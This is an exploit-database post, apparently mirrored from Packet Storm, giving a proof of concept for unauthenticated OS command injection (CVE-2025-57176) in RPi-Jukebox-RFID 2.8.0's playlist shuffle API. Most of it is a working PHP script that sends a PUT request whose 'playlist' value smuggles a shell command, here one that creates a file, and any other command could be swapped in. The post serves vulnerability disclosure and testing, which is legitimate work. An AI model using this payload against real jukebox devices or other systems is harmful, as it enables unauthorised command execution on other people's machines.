Share
## https://sploitus.com/exploit?id=PACKETSTORM:214281
=============================================================================================================================================
    | # Title     : RPi-Jukebox-RFID 2.8.0 OS Command Injection                                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://github.com/MiczFlor/RPi-Jukebox-RFID                                                                                |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/214067/ & CVE-2025-57176
    
    [+] Summary    : RPi-Jukebox-RFID version 2.8.0 suffers from an OS command injection vulnerability in the API endpoint:
                     /phoniebox/api/playlist/shuffle.php
                     The "playlist" JSON parameter is passed directly into a shell command without proper sanitization or escaping. This allows unauthenticated
    				 remote attackers to execute arbitrary system commands.
    
    [+] POC: A crafted PUT request with a malicious JSON payload allows execution of OS-level commands such as file creation.
    
             php poc.php 
    
    <?php
    
    
    $target = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php";
    
    $injectedCommand = "test';touch indoushka.txt;echo '";
    
    $data = json_encode([
        "playlist" => $injectedCommand,
        "shuffle"  => "true"
    ]);
    
    $headers = [
        "Content-Type: application/json",
        "User-Agent: Mozilla/5.0"
    ];
    
    $ch = curl_init($target);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    
    echo "[+] Sending malicious JSON payload...\n";
    $response = curl_exec($ch);
    
    if ($response === false) {
        echo "[-] cURL Error: " . curl_error($ch) . "\n";
    } else {
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        echo "[+] HTTP Status Code: {$httpCode}\n";
        echo "[*] If vulnerable, file 'indoushka.txt' will be created on the server.\n";
    }
    
    curl_close($ch);
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================